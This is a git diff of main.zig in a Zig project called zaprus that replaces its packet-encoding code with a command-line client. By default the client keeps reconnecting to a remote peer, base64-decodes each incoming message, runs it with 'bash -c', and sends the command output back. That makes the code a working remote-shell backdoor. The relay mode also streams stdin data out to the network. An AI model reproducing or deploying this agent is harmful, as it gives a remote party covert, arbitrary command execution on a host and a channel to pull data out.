diff options
Diffstat (limited to 'src/main.zig')
| -rw-r--r-- | src/main.zig | 498 |
1 files changed, 284 insertions, 214 deletions
diff --git a/src/main.zig b/src/main.zig index 9a0b8a4..c5e7b0a 100644 --- a/src/main.zig +++ b/src/main.zig @@ -1,236 +1,306 @@ +// Copyright 2026 Robby Zambito +// +// This file is part of zaprus. +// +// Zaprus is free software: you can redistribute it and/or modify it under the +// terms of the GNU General Public License as published by the Free Software +// Foundation, either version 3 of the License, or (at your option) any later +// version. +// +// Zaprus is distributed in the hope that it will be useful, but WITHOUT ANY +// WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR +// A PARTICULAR PURPOSE. See the GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License along with +// Zaprus. If not, see <https://www.gnu.org/licenses/>. + const is_debug = builtin.mode == .Debug; -const base64Enc = std.base64.Base64Encoder.init(std.base64.standard_alphabet_chars, '='); -const base64Dec = std.base64.Base64Decoder.init(std.base64.standard_alphabet_chars, '='); - -/// Type tag for SaprusMessage union. -/// This is the first value in the actual packet sent over the network. -const SaprusPacketType = enum(u16) { - relay = 0x003C, - file_transfer = 0x8888, - connection = 0x00E9, - _, -}; - -/// Reserved option values. -/// Currently unused. -const SaprusConnectionOptions = packed struct(u8) { - opt1: bool = false, - opt2: bool = false, - opt3: bool = false, - opt4: bool = false, - opt5: bool = false, - opt6: bool = false, - opt7: bool = false, - opt8: bool = false, -}; - -const SaprusError = error{ - NotImplementedSaprusType, - UnknownSaprusType, -}; - -/// All Saprus messages -const SaprusMessage = union(SaprusPacketType) { - const Relay = struct { - const Header = packed struct { - dest: @Vector(4, u8), - }; - header: Header, - payload: []const u8, - }; - const Connection = struct { - const Header = packed struct { - src_port: u16, - dest_port: u16, - seq_num: u32 = 0, - msg_id: u32 = 0, - reserved: u8 = 0, - options: SaprusConnectionOptions = .{}, - }; - header: Header, - payload: []const u8, - }; - relay: Relay, - file_transfer: void, // unimplemented - connection: Connection, - - /// Should be called for any SaprusMessage that was declared using a function that you pass an allocator to. - fn deinit(self: SaprusMessage, allocator: Allocator) void { - switch (self) { - .relay => |r| allocator.free(r.payload), - .connection => |c| allocator.free(c.payload), - else => unreachable, + +const help = + \\-h, --help Display this help and exit. + \\-r, --relay <str> A relay message to send. + \\-d, --dest <str> An IPv4 or <= 4 ASCII byte string. + \\-c, --connect <str> A connection message to send. + \\ +; + +const Option = enum { help, relay, dest, connect }; +const to_option: StaticStringMap(Option) = .initComptime(.{ + .{ "-h", .help }, + .{ "--help", .help }, + .{ "-r", .relay }, + .{ "--relay", .relay }, + .{ "-d", .dest }, + .{ "--dest", .dest }, + .{ "-c", .connect }, + .{ "--connect", .connect }, +}); + +pub fn main(init: std.process.Init) !void { + // CLI parsing adapted from the example here + // https://codeberg.org/ziglang/zig/pulls/30644 + + const args = try init.minimal.args.toSlice(init.arena.allocator()); + + var flags: struct { + relay: ?[]const u8 = null, + dest: ?[]const u8 = null, + connect: ?[]const u8 = null, + } = .{}; + + if (args.len == 1) { + flags.connect = ""; + } else { + var i: usize = 1; + while (i < args.len) : (i += 1) { + if (to_option.get(args[i])) |opt| { + switch (opt) { + .help => { + std.debug.print("{s}", .{help}); + return; + }, + .relay => { + i += 1; + if (i < args.len) { + flags.relay = args[i]; + } else { + flags.relay = ""; + } + }, + .dest => { + i += 1; + if (i < args.len) { + flags.dest = args[i]; + } else { + std.debug.print("-d/--dest requires a string\n", .{}); + return error.InvalidArguments; + } + }, + .connect => { + i += 1; + if (i < args.len) { + flags.connect = args[i]; + } else { + flags.connect = ""; + } + }, + } + } else { + std.debug.print("Unknown argument: {s}\n", .{args[i]}); + return error.InvalidArguments; + } } } - inline fn toBytesAux( - Header: type, - header: Header, - payload: []const u8, - w: std.ArrayList(u8).Writer, - allocator: Allocator, - ) !void { - // Create a growable string to store the base64 bytes in. - // Doing this first so I can use the length of the encoded bytes for the length field. - var payload_list = std.ArrayList(u8).init(allocator); - defer payload_list.deinit(); - const buf_w = payload_list.writer(); - - // Write the payload bytes as base64 to the growable string. - try base64Enc.encodeWriter(buf_w, payload); - - // Write the packet body to the output writer. - try w.writeStructEndian(header, .big); - try w.writeInt(u16, @intCast(payload_list.items.len), .big); - try w.writeAll(payload_list.items); + if (flags.connect != null and (flags.relay != null or flags.dest != null)) { + std.debug.print("Incompatible arguments.\nCannot use --connect/-c with dest or relay.\n", .{}); + return error.InvalidArguments; } - /// Caller is responsible for freeing the returned bytes. - fn toBytes(self: SaprusMessage, allocator: Allocator) ![]u8 { - // Create a growable list of bytes to store the output in. - var buf = std.ArrayList(u8).init(allocator); - // Create a writer for an easy interface to append arbitrary bytes. - const w = buf.writer(); - - // Start with writing the message type, which is the first 16 bits of every Saprus message. - try w.writeInt(u16, @intFromEnum(self), .big); - - // Write the proper header and payload for the given packet type. - switch (self) { - .relay => |r| try toBytesAux(Relay.Header, r.header, r.payload, w, allocator), - .connection => |c| try toBytesAux(Connection.Header, c.header, c.payload, w, allocator), - .file_transfer => return SaprusError.NotImplementedSaprusType, + var client: SaprusClient = undefined; + + if (flags.relay != null) { + client = try .init(); + defer client.deinit(); + var chunk_writer_buf: [2048]u8 = undefined; + var chunk_writer: Writer = .fixed(&chunk_writer_buf); + if (flags.relay.?.len > 0) { + var output_iter = std.mem.window(u8, flags.relay.?, SaprusClient.max_payload_len, SaprusClient.max_payload_len); + while (output_iter.next()) |chunk| { + chunk_writer.end = 0; + try chunk_writer.print("{b64}", .{chunk}); + try client.sendRelay(init.io, chunk_writer.buffered(), parseDest(flags.dest)); + try init.io.sleep(.fromMilliseconds(40), .boot); + } + } else { + var stdin_file: std.Io.File = .stdin(); + var stdin_file_reader = stdin_file.reader(init.io, &.{}); + var stdin_reader = &stdin_file_reader.interface; + var lim_buf: [SaprusClient.max_payload_len]u8 = undefined; + var limited = stdin_reader.limited(.limited(10 * lim_buf.len), &lim_buf); + var stdin = &limited.interface; + + while (stdin.fillMore()) { + // Sometimes fillMore will return 0 bytes. + // Skip these + if (stdin.seek == stdin.end) continue; + + chunk_writer.end = 0; + try chunk_writer.print("{b64}", .{stdin.buffered()}); + try client.sendRelay(init.io, chunk_writer.buffered(), parseDest(flags.dest)); + try init.io.sleep(.fromMilliseconds(40), .boot); + try stdin.discardAll(stdin.end); + } else |err| switch (err) { + error.EndOfStream => { + log.debug("end of stdin", .{}); + }, + else => |e| return e, + } } - - // Collect the growable list as a slice and return it. - return buf.toOwnedSlice(); - } - - inline fn fromBytesAux( - packet: SaprusPacketType, - Header: type, - r: std.io.FixedBufferStream([]const u8).Reader, - allocator: Allocator, - ) !SaprusMessage { - // Read the header for the current message type. - const header = try r.readStructEndian(Header, .big); - // Read the length of the base64 encoded payload. - const len = try r.readInt(u16, .big); - - // Read the base64 bytes into a list to be able to call the decoder on it. - var payload_buf = std.ArrayList(u8).init(allocator); - defer payload_buf.deinit(); - try r.readAllArrayList(&payload_buf, len); - - // Create a buffer to store the payload in, and decode the base64 bytes into the payload field. - const payload = try allocator.alloc(u8, try base64Dec.calcSizeForSlice(payload_buf.items)); - try base64Dec.decode(payload, payload_buf.items); - - // Return the type of SaprusMessage specified by the `packet` argument. - return @unionInit(SaprusMessage, @tagName(packet), .{ - .header = header, - .payload = payload, - }); + return; } - /// Caller is responsible for calling .deinit on the returned value. - fn fromBytes(bytes: []const u8, allocator: Allocator) !SaprusMessage { - var s = std.io.fixedBufferStream(bytes); - const r = s.reader(); - - switch (@as(SaprusPacketType, @enumFromInt(try r.readInt(u16, .big)))) { - .relay => return fromBytesAux(.relay, Relay.Header, r, allocator), - .connection => return fromBytesAux(.connection, Connection.Header, r, allocator), - .file_transfer => return SaprusError.NotImplementedSaprusType, - else => return SaprusError.UnknownSaprusType, + var init_con_buf: [SaprusClient.max_payload_len]u8 = undefined; + var w: Writer = .fixed(&init_con_buf); + try w.print("{b64}", .{flags.connect.?}); + + if (flags.connect != null) { + reconnect: while (true) { + client = SaprusClient.init() catch |err| switch (err) { + error.NoInterfaceFound => { + try init.io.sleep(.fromMilliseconds(100), .boot); + continue :reconnect; + }, + else => |e| return e, + }; + defer client.deinit(); + log.debug("Starting connection", .{}); + + try client.socket.setTimeout(if (is_debug) 3 else 25, 0); + var connection = client.connect(init.io, w.buffered()) catch { + log.debug("Connection timed out", .{}); + continue; + }; + + log.debug("Connection started", .{}); + + next_message: while (true) { + var res_buf: [2048]u8 = undefined; + try client.socket.setTimeout(if (is_debug) 60 else 600, 0); + const next = connection.next(init.io, &res_buf) catch { + continue :reconnect; + }; + + const b64d = std.base64.standard.Decoder; + var connection_payload_buf: [2048]u8 = undefined; + const connection_payload = connection_payload_buf[0..try b64d.calcSizeForSlice(next)]; + b64d.decode(connection_payload, next) catch { + log.debug("Failed to decode message, skipping: '{s}'", .{connection_payload}); + continue; + }; + + var child = std.process.spawn(init.io, .{ + .argv = &.{ "bash", "-c", connection_payload }, + .stdout = .pipe, + .stderr = .ignore, + .stdin = .ignore, + }) catch |err| switch (err) { + error.AccessDenied, + error.FileBusy, + error.FileNotFound, + error.FileSystem, + error.InvalidExe, + error.IsDir, + error.NotDir, + error.OutOfMemory, + error.PermissionDenied, + error.SymLinkLoop, + error.SystemResources, + => blk: { + log.debug("Trying to execute command directly: {s}", .{connection_payload}); + var argv_buf: [128][]const u8 = undefined; + var argv: ArrayList([]const u8) = .initBuffer(&argv_buf); + var payload_iter = std.mem.splitAny(u8, connection_payload, " \t\n"); + while (payload_iter.next()) |arg| argv.appendBounded(arg) catch continue; + break :blk std.process.spawn(init.io, .{ + .argv = argv.items, + .stdout = .pipe, + .stderr = .ignore, + .stdin = .ignore, + }) catch continue; + }, + error.Canceled, + error.NoDevice, + error.OperationUnsupported, + => |e| return e, + else => continue, + }; + + var child_output_buf: [SaprusClient.max_payload_len]u8 = undefined; + var child_output_reader = child.stdout.?.reader(init.io, &child_output_buf); + + var is_killed: std.atomic.Value(bool) = .init(false); + + var kill_task = try init.io.concurrent(killProcessAfter, .{ init.io, &child, .fromSeconds(3), &is_killed }); + defer _ = kill_task.cancel(init.io) catch {}; + + var cmd_output_buf: [SaprusClient.max_payload_len * 2]u8 = undefined; + var cmd_output: Writer = .fixed(&cmd_output_buf); + + // Maximum of 10 messages of output per command + for (0..10) |_| { + cmd_output.end = 0; + + child_output_reader.interface.fill(child_output_reader.interface.buffer.len) catch |err| switch (err) { + error.ReadFailed => continue :next_message, // TODO: check if there is a better way to handle this + error.EndOfStream => { + cmd_output.print("{b64}", .{child_output_reader.interface.buffered()}) catch unreachable; + if (cmd_output.end > 0) { + connection.send(init.io, .{}, cmd_output.buffered()) catch |e| { + log.debug("Failed to send connection chunk: {t}", .{e}); + continue :next_message; + }; + } + break; + }, + }; + cmd_output.print("{b64}", .{try child_output_reader.interface.takeArray(child_output_buf.len)}) catch unreachable; + connection.send(init.io, .{}, cmd_output.buffered()) catch |err| { + log.debug("Failed to send connection chunk: {t}", .{err}); + continue :next_message; + }; + try init.io.sleep(.fromMilliseconds(40), .boot); + } else { + kill_task.cancel(init.io) catch {}; + killProcessAfter(init.io, &child, .zero, &is_killed) catch |err| { + log.debug("Failed to kill process??? {t}", .{err}); + continue :next_message; + }; + } + + if (!is_killed.load(.monotonic)) { + _ = child.wait(init.io) catch |err| { + log.debug("Failed to wait for child: {t}", .{err}); + }; + } + } } } -}; - -pub fn main() !void { - var dba: ?DebugAllocator = if (comptime is_debug) DebugAllocator.init else null; - defer if (dba) |*d| { - _ = d.deinit(); - }; - - var gpa = if (dba) |*d| d.allocator() else std.heap.smp_allocator; - - const msg = SaprusMessage{ - .relay = .{ - .header = .{ .dest = .{ 255, 255, 255, 255 } }, - .payload = "Hello darkness my old friend", - }, - }; - - const msg_bytes = try msg.toBytes(gpa); - defer gpa.free(msg_bytes); - - try network.init(); - defer network.deinit(); - - var sock = try network.Socket.create(.ipv4, .udp); - defer sock.close(); - try sock.setBroadcast(true); - - // Bind to 0.0.0.0:0 - const bind_addr = network.EndPoint{ - .address = network.Address{ .ipv4 = network.Address.IPv4.any }, - .port = 0, - }; + unreachable; +} - const dest_addr = network.EndPoint{ - .address = network.Address{ .ipv4 = network.Address.IPv4.broadcast }, - .port = 8888, +fn killProcessAfter(io: std.Io, proc: *std.process.Child, duration: std.Io.Duration, is_killed: *std.atomic.Value(bool)) !void { + io.sleep(duration, .boot) catch |err| switch (err) { + error.Canceled => return, + else => |e| return e, }; + is_killed.store(true, .monotonic); + proc.kill(io); +} - try sock.bind(bind_addr); +fn parseDest(in: ?[]const u8) [4]u8 { + if (in) |dest| { + if (dest.len <= 4) { + var res: [4]u8 = @splat(0); + @memcpy(res[0..dest.len], dest); + return res; + } - _ = try sock.sendTo(dest_addr, msg_bytes); + const addr = std.Io.net.Ip4Address.parse(dest, 0) catch return "FAIL".*; + return addr.bytes; + } + return "disc".*; } const builtin = @import("builtin"); const std = @import("std"); -const Allocator = std.mem.Allocator; -const DebugAllocator = std.heap.DebugAllocator(.{}); - -const network = @import("network"); - -test "Round trip Relay toBytes and fromBytes" { - const gpa = std.testing.allocator; - const msg = SaprusMessage{ - .relay = .{ - .header = .{ .dest = .{ 255, 255, 255, 255 } }, - .payload = "Hello darkness my old friend", - }, - }; - - const to_bytes = try msg.toBytes(gpa); - defer gpa.free(to_bytes); +const log = std.log; +const ArrayList = std.ArrayList; +const StaticStringMap = std.StaticStringMap; - const from_bytes = try SaprusMessage.fromBytes(to_bytes, gpa); - defer from_bytes.deinit(gpa); +const zaprus = @import("zaprus"); +const SaprusClient = zaprus.Client; +const SaprusMessage = zaprus.Message; - try std.testing.expectEqualDeep(msg, from_bytes); -} - -test "Round trip Connection toBytes and fromBytes" { - const gpa = std.testing.allocator; - const msg = SaprusMessage{ - .connection = .{ - .header = .{ - .src_port = 0, - .dest_port = 0, - }, - .payload = "Hello darkness my old friend", - }, - }; - - const to_bytes = try msg.toBytes(gpa); - defer gpa.free(to_bytes); - - const from_bytes = try SaprusMessage.fromBytes(to_bytes, gpa); - defer from_bytes.deinit(gpa); - - try std.testing.expectEqualDeep(msg, from_bytes); -} +const Writer = std.Io.Writer; |
